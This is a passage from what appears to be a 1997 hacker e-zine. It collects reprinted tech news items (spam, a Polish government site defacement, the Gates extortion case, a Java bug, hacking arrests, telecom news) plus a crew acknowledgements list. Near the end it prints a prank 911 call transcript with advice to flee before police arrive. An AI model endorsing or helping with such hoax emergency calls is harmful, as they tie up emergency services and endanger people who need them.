that Hong Kong citizens are more accepting of junk e-mail. Alamo Music's Alleva says about 10 percent of the replies to his bulk e-mails, sent to Hong Kong and global Internet users, are negative. But Alleva's statistics aren't necessarily accurate because, for one thing, his software automatically "bounces back" any messages from irate users who use foul language. Creating commercial Web sites is cheap, but it's not an effective marketing tool unless you get visitors. Bulk e-mail is attractive because it can reach huge numbers at practically no cost. Spammers rave about how cheap it all is. But like selfish children, they conveniently ignore the hard fact that someone is picking up the bill for them. In most cases, it is the ISPs who have to purchase more computers to process the extra e-mail traffic. Netvigator, for instance, cited an overloaded and subsequently crashed e-mail computer to Alleva as its official reason for terminating his "ccr" account. More staff is also required to field complaints from subscribers and Internet users worldwide. Spam recipients aren't spared, as they must spend time downloading, reading and deleting unwanted e-mail, ask to be removed from junk e-mail lists, or implement filters to block out spam. ©1997 Newsbytes _____________________________________________________________ Polish Govt Web Site Hacked - Police Investigate By Sylvia Dennis WARSAW, POLAND, 1997 MAY 9 (NB) -- Polish government officials were outraged this week when it was revealed that the Cabinet office's newly established Web site had been altered by Polish hackers calling themselves Damage Inc. The Cabinet Web site has now been taken offline, but a copy of the altered Web site can be found at http:/www.software.com.pl/intdev /news/welcomep.html the site of the Net security Institute in Warsaw. The hackers altered much of the data on the site by uploading their own pages last weekend, with headers such as "Hackpolska Polska (Hackrepublic of Poland) and the "Centrum DizinInformacyjne Polska" (Polish Government Disinformation Center." Links from the Cabinet office site were rerouted to a number of sexually explicit sites. For example, the routes from the site to information about the Prime Minister route to http://www.playboy.com . Interestingly, many of the routes from the Web site appear to have been trashed, and supporting images on the Web site (GIFs) no longer load as requested. This suggests that the hackers used a "quick and dirty" method of trashing the site, rather than taking their time. Gazeta Wyborcza, the Polish daily newspaper, reports that the police, at the express request of the government, have set up a task force to track down the hackers, who are thought to reside in Poland. What the hackers may not be aware of, Newsbytes notes, is that Polska Telecom is still a state operation, and that listings of telephone accesses to the Internet are freely available to the Polish secret service. It seems logical to assume that the police are now hot on the trail of the hackers. At a press briefing in Warsaw to discuss the hack, the most serious in Polish history, government spokesperson Aleksandra Jakubowska said that the government Web server has been disconnected from the Internet until new security systems are installed. Considerable anti-hacking fury has been generated by the hack, and Newsbytes' sources suggest that this may be the catalyst for the Polish government to formulate its own computer misuse legislation. As Poland is now on the way to joining the European Community, this unexpected step, by "Damage Inc" could bring the creation of the legislation forward by several years. ©1997 Newsbytes _____________________________________________________________ Gates Harasser Charged (05/16/97; 11:00 a.m. EDT) By Christine Casatelli, TechWire SEATTLE -- A 21-year-old Illinois man was arrested after threatening to kill Microsoft chairman Bill Gates and his wife unless they paid him $5 million, according to an Associated Press report Thursday. Adam Quinn Pletcher is charged with making the threats in four letters sent to Gates at Microsoft's Redmond, Wash., headquarters, the AP report said. A federal grand jury here indicted Pletcher on Wednesday. "Obviously, we have taken this threat very seriously," said Mark Murray, a Microsoft spokesman. The matter was handled in a "rather routine matter" by Microsoft security, local police and the FBI, he said. "Bill was never involved in any way in the investigation," said Murray, adding that he would not comment on whether Gates would be asked to testify. The first letter, which was received March 14 and intercepted by Microsoft security, demanded that Gates post a personal ad on America Online to communicate with the writer. The last letter, received April 17, told Gates he must put money in a foreign bank no later than April 26 ``to avoid dying, among other things,'' the AP report said. Also included in the letter was a computer disk to be used by Gates to communicate with the writer, who is said to live in Long Grove, Ill. "The writer cautioned Gates not to notify law enforcement, and that if Gates did so, the writer could kill him with `one bullet from my rifle at a quarter of a mile away,'" the court documents said. Pletcher also has been the target of a civil lawsuit filed by Illinois authorities charging that he operated a fraud scheme over the Internet, the AP report said. Neither Gates nor his wife were harmed, and the $5 million demand was not paid, the AP report said. Pletcher was released after posting $100,000 bail. If convicted of extortion, he faces a maximum punishment of 20 years in jail and a $250,000 fine. The arraignment is scheduled for May 22. ©CMP Media, 1996. _____________________________________________________________ Java Bug Discovered (05/18/97; 2:45 p.m. EDT) By Deborah Gage, Computer Reseller News JavaSoft has posted a statement on its web page acknowledging a Java verifier bug found by researchers at the University of Washington. A JavaSoft spokeswoman said the bug enables a class file to filter through the Java verifier and possibly crash the Java Virtual Machine. JavaSoft does not consider the bug a security bug because the University of Washington did not do a security, or so-called denial-of-service, attack. JavaSoft will issue a patch for Java licensees this week and a fix will go out in version 1.1.2 of the Java Developers Kit, due within the next two weeks. The University of Washington is also working with Microsoft on bugs found in the Internet Explorer browser, sources said. A Microsoft spokeswoman said, however, that no similar announcement was planned and that she was unaware of any bugs. ©CMP Media, 1996. _____________________________________________________________ Anti-Microsoft Sites Rampant On Web (05/20/97; 9:00 a.m. EDT) By Malcolm Maclachlan , TechWire REDMOND, Wash. -- In the Internet Age, you know you're a VIP when someone creates a Website just to make fun of you. No one is more of a VIP than Microsoft chairman Bill Gates. However, the most mocked on the Internet seems to have taken the attitude that when you're the biggest, you can take the punches. "There is so much humor and parody on the Internet," said Kurt Winkelman, cocreator of a spoof site known as Microcult. "Some of the bigger companies take it as a compliment." Microcult compares the software giant to a cult along the lines of Heaven's Gate. It purports to offer products such as ActiveCult 97 and values employees willing "to kill themselves for the sake of technology." The site is the work of Wilmington, Del.-based Museum Mercantile Ltd., a Web design and hosting firm run by Winkelman and two colleagues. However, far from being Microsoft haters, the company uses many of its products and has even done work for Microsoft. The site just seemed like a fun thing to do, said Winkelman, adding that he was inspired by another site -- Microsnot -- which included a press release on Bill Gates buying England. Similarly, he said, some of the site's biggest fans are Microsoft employees. There are spoof sites for other companies, too, Winkelman said, including Wired and CNet. No one, however, compares with Microsoft, he said. There is now a Website dedicated exclusively toward cataloging Microsoft spoof sites, called The MSBC Super List of Anti-Microsoft Websites, which contains more than 80 such links. Common themes include comparing Gates to Satan or Bill Clinton. Other links include the The Boycott Microsoft page and the subtly named Microsoft Sucks page. There is even The Bill Gates Personal Wealth Clock, which tries to keep up to date with Gates' immense personal fortune. Despite all the venom, Microsoft does not seem particularly concerned, even with sites that copy its logos for hostile satire. "Microsoft does not have any specific stance on spoof sites," a Microsoft spokesman said. The software giant has not taken action against the developers on any of the parody Websites, he said. "There are so many out there, we just let them be." ©CMP Media, 1996. _____________________________________________________________ World Wide Web to arrive on pay phones May 20, 1997 TORONTO (Reuter) -- The World Wide Web might be coming to a pay phone near you, thanks to a small Canadian multimedia company that teamed up Tuesday with a Hong Kong telecommunications concern. King Products Inc. said it received a $2.2 million order to supply multimedia and Internet-ready pay phones to INFA Telecom Asia Ltd. of Hong Kong. Called PowerPhones, the units will be installed in the Hong Kong Convention and Exhibition Center in time for the July 1 handover ceremony marking the transfer of the former British colony to China. PowerPhones will also be installed in railway stations and other tourist spots in Hong Kong and throughout China. "The PowerPhone is a major advance from the pay phones of the past that we have all become familiar with," King President Peter Richards said at a news conference. The wall-mounted unit is a combination pay phone and network computer that allows the display of advertising, telephone directories, hotel and restaurant reservations and other information. Company officials explained that the phone can be used to find a restaurant, make a reservation or call up a map for directions. The phones will also allow users to send and receive e-mail and surf the Internet, though these features will not be available immediately. The phone comes with a handset, a color touch screen and a slot for so-called smart cards and credit cards. It is powered by an Intel Corp. Pentium processor and uses various Internet protocols and accessories to run videos. "We expect to deploy the PowerPhone throughout Hong Kong and subsequently into China over the course of the year," INFA Telecom Chairman Peter Tsang said in a statement. King, best known for its line of electronic kiosks in malls and other public places, will make the units in Canada for INFA Telecom, which has operations in 70 Chinese cities. iMagic Infomedia Technology Ltd. of Hong Kong is providing software development for the product. King officials said the PowerPhone will be distributed in North America but could not give a date. ©1997 Reuters Limited. _____________________________________________________________ Phone company says: Put your life on hold until we fix your line Thursday, May 22, 1997 SILICON VALLEY DISPATCHES: MIKE CASSIDY THIS TALK of high-speed communication, ISDN, T1, cellular, fax and the rest makes Thomas Wyskida and Renata Kusiak laugh. They have to laugh; otherwise they'd kill somebody. It's been three months since they moved from tiny Wappingers Falls, N.Y., to the self-proclaimed Heart of Silicon Valley, but the technology revolution has eluded them entirely. "I can't even call up to order a pizza," Wyskida, 28, says. It's the phone, or the lack of one. They are discovering what thousands in Silicon Valley know: Getting quick phone service around here is akin to hitting the lottery. With job growth and the Internet boom, Pacific Bell had a back-up of 2,000 service orders in its service area last week. People are considering bequeathing their place in line to their children or grandchildren. Besides saying this will improve, the phone company says this is a good thing. It means their services are really popular. They had no idea so many would want so much -- second lines, high-speed computer connections -- so fast. "I think that we're in a fairly unique position in this part of the country," says Ho Blair, media relations manager. "There is an increased awareness and sensitivity and state-of-the-art knowledge of telecommunications." As one who manages media relations, Blair would rather you not call service delays a problem. "It's not a problem," he says. "It's quite frankly a situation of heavy demand." Which makes Wyskida laugh some more. The phone at the Sunnyvale home he shares with Kusiak, 31, went dead April 6. Workers fixed the corroded cables outside his house May 2. In between, he called Pac Bell every day asking for help. "I probably talked to every one of their operators in 30 days," he says. "I'm probably on some kind of death list." OK. It's not like his phone didn't work at all. "At 3 o'clock in the morning, the phone would ring. You'd pick it up and you'd hear loud noises and static." And it's not like Pac Bell was unsympathetic. One operator suggested he forward his calls to a neighbor. Wyskida was beginning to think California was a very different place. "I figured, it's the same country. How much different can it be?" But there he was, using a liquor store pay phone to work on his job search and call friends in New York. And, of course, to call Pac Bell, which did fix the problem. The phone company even called to check in. "It was somebody from the billing department," Wyskida says. "They wanted to know if I received a bill yet." ©San Jose Mercury News 1997 _____________________________________________________________ Japanese Police Nab Computer User On Hacking Charges TOKYO, JAPAN, 1997 MAY 26 (NB) -- By Martyn Williams. Japanese police said Friday, they had arrested a Saitama prefecture resident on charges covered by a recent computer hacking law, the first such time the law has been used. The man replaced weather images on the home page of TV-Asahi, a national TV network, with pornographic images. Koichi Kuboshima, a 27-year old resident of Fujimi, Saitama Prefecture, just north of Tokyo, allegedly exploited a function on the Web page that allows users to upload weather information. Police tracked down Kuboshima by gaining access to the records of an Internet service provider that he reportedly used to carry out the hack. Local press reports said the account was opened with a false credit card number and name. Weather images were replaced with the images at 10am last Sunday morning and the Web site was taken down at 10:10am when other users notified TV-Asahi. The site was repaired and available again at 1pm. If convicted, Kuboshima faces a fine up to one million yen ($8,635) and up to five years behind bars. ©1997 Newsbytes _____________________________________________________________ Opening Communication Between PCs and Phones by Chris Oakes 11:58am 29.May.97.PDT -- Despite the possible uses of linking caller-ID information to software on the PC, the long-available enabling products haven't become household - or even SOHO - names. So far, offerings exploiting caller-ID intelligence have been aimed at larger, multi-line businesses. Next month, one company hopes to make PC-based caller-ID technology more commonplace. To manage the caller-ID information of a single voice line, SOHOtools' Connect-ID, to be announced at the Atlanta Comdex show, will work in concert with database and contact-management software to let a PC react to incoming calls. The company says its retail price, US$60, introduces a new market to "voice communication management." "A number of people have goofed around with caller ID," says SOHOtools marketing director Don Wallis, "but it has never really been put into a retail scenario." The software-plus-hardware product touts call-tracking benefits via software designed to work in concert with Windows personal information managers such as Act and SideKick. As they become compatible with telephony APIs like Microsoft's TAPI, these and other applications can interact with telco-provided features like caller ID. Combined with inter-application standards like Windows' Dynamic Data Exchange, the potential actions initiated by a phone call multiply. The most obvious use of caller ID for the SOHO market is to leverage caller ID in a fashion similar to a big call center. When the call comes in, in addition to being logged and tracked by a database, a wealth of caller information is instantly accessed. SOHO users can be as responsive to customers' needs and interests as a large corporate call center. While increasingly sophisticated in email and fax communications, the PC has lagged in the management of the voice phone call. "The modem market had telephony all tied up," said Heather Poggimannis, VAR program manager for Rochelle Communications, which has been selling caller-ID PC products to businesses for several years. She says with the dominance of the modem between the PC and a phone line, it's been hard for the more truly telephony-oriented caller-ID device to make headway. Modem-makers like US Robotics are now making caller-ID functionality standard in their products, but without taking the technology beyond a software-based version of simple caller-ID devices. Nor does it often make sense to try to employ caller ID through a modem, she says, since that line is usually tied up with data duties. The combination technology also uniquely depends on the maneuvering of two industries - the telco and PC industries, neither intimately familiar with the other's market. Within the PC retail market, Poggimannis says caller-ID products suffer something of an identity crisis. Their vague "telephony" category - typically conjuring up modems and online communications - has made them difficult for stores to categorize and consumers to grasp. Complicating the issue is the fact that caller ID has only barely become available nationally, requiring the PC industry to wait while telcos iron out the technology and upgrade networks for universal deployment. "There's recently been a major push [for caller ID]," said Poggimannis, "but only from the telco side of the street." And their side doesn't work with PC applications in mind. "It's not their market." Wallis is undaunted. "Our game plan is to come from the bottom up," he said. If his company can satisfy people with four lines at a new price point of less than $400, he reasons, it can generate the business to establish a profitable retail market - ultimately creating a new category of "voice management" products. Meanwhile, for consumers, Jeff Johnson of Computer Professionals for Social Responsibility sees as much misery as benefit from the convergence of the PC with caller ID. "Before, the technology necessary to invade our privacy could only be afforded by large companies - the Fortune 500. Then the technology spread to the Fortune 5000, and now it's about to spread to the Fortune 500,000. Is that progress?" ©1993-97 Wired Ventures, Inc. _____________________________________________________________ Phone giants talk of $50 billion deal USA Today, May 28, 1997 AT&T and SBC Communications, the prior Southwestern Bell, are trying to come up with a merger accord that would be worth $50 bil, the largest merger in history. It would unite AT&T, which has a 52% market share in the US long distance sector, and SBC which, since merging with Pacific Telesis, has a 25% market share in US local calling. Nevertheless, the merger would be expected to face antitrust and regulatory hurdles. AT&T would become a telecom giant with revenue of $80 bil/yr, which would be considerably larger than the second largest phone firm, which is the merged Bell Atlantic-Nynex with revenue in 1996 of $30 bil. Although AT&T does not have problems now, problems can be expected in the future due to fierce competition from other mergers. Detail is given to what the Justice Department's antitrust div can be expected to examine in looking at the possible merger. ©1997 USA Today _____________________________________________________________ 13. HFStival on May 31st The 8th Annual HFStival run by Scud-O's favorite local radio station, WHFS 99.1 is going to take place this May 31st at RFK Stadium in Washington DC. I hope you got your tickets early, as they sold out in a record 97 minutes this year. This year, the tickets went for $20 ( plus a $3.50 service charge) for 20 bands. The bands playing include: Prodigy, Beck, Cardigans, Jamiroquai, Mighty Mighty Bosstones, Reel Big Fish, Squrel Nut Zippers, Summer Camp, Verve Pipe, Kula Shaker, Local H, K's Choice, Jimmie's Chicken Shack, and........ SOUL COUGHING ( Look at the article after the editorial in this issue for more info), and several other TBA bands. [P H O N E L O G S]------------------------------------------------ Ummm, hello there, 911? Yes, how may i direct your call Um, can you call my mommy for me? No sir, we dont do that, this line is needed for other calls Well, im hurt, i need help Whats wrong sir? I just kiiled someone Sir, is this a prank? No, im serious, i need help, he attacked me, and i fought back, now he's dead! Who is dead sir? He is! I killed him! Sir, who did you kill? HIM! I KILLED HIM! Sir, im forwarding you to the police No, i need help, he needs to be stiched up Who needs to be stiched up? HE does, my teddy bear. Sir, this is a prank, please hang up. NO! Not until i get my mommy! Sir, calling up 911 without an emergancy is a crime, i am sending a squad car out to your location. Well, ok, will they have my mommy? No, no they will not have your mommy Will they have a warm cuddy blanket for me? No Warm cookies and milk? NO! OK then, bye-bye. [ C L I C K ] NOTE: This was done in a local mall about 30 minutes before the stores opened, so it was pretty quiet, but a squad car did show up, so next time you call 911, make sure you get away fast. _____________________________________________________________ ------------------------ ---------------------- -[HAVOC Bell Systems]- -[Acknowledgements]- ------------------------ ---------------------- ArcAngl : Just joined up Agrajag : Back from the dead btm : Elite (MIA?) darkcyde : #phreak old-schooler digipimp : Co-conspirator Digital_X : Nemesis (MIA?) dr1x : It's 420! disc0re : Thinks were on NBC ec|ipse : Hysterical bastard Keystroke : Submissions Editor shamrock : nice hair KungFuFox : Helped Reform #phreak RBCP : Funniest man alive memor : Ueberleet French phreak shoelace : FINALLY has ops psych0 : Lame ass mofo halflife : master idler REality : Owns Own3r darc : Left #phreak Scud-O : Has a new car! JP : Runs Antionline.com Redtyde : #phreak not so old-schooler tombin : phear! theLURK3R : Out Clubing antifire : NT security guru UnaBomber : Tired of IRC (MIA?) ChiaPope : sniff, we miss wrath! FH : He's so FUCKING HOSTILE! ------------------- TMessiah : Believes in 'Utopia' -[ Channels ]- fsh : Text File Archiver ------------------- Modify : Lives near Scud-O #phreak : Newly Reformed |Banshee| : Also lives near Scud-O #hackteach: One Busy Channel mC : infected.com - nuff said! #sin : SIN Home silitoad : Did ya like thtj? _____________________________________________________________ This Month's Question: What the fuck is this m00 thing? m00 v1.0 is a simple Firewall Defense Mechanism i am creating. I have absolutly no idea when it will come out, so dont bug me about it. _____________________________________________________________ Next Month: Look, we can predict the future about as well as a weatherman, so just chill out until july 1st to see what is going to be in thtj12! Issue 12 is out July 1st! Send all articles for issue 12 to Keystroke at: keystroke@thepentagon.com Tune in next time, Same Bat Time, Same Bat Channel! ========================================================== = Is this copy of The HAVOC Technical Journal skunked? = = If this file doesn't read at 120924 bytes, it probably = = doesn't have a born on date! Get a fresh copy from our = = NEW site at: http://www.antionline.com/hbs/ = ========================================================== -[End of Communique]-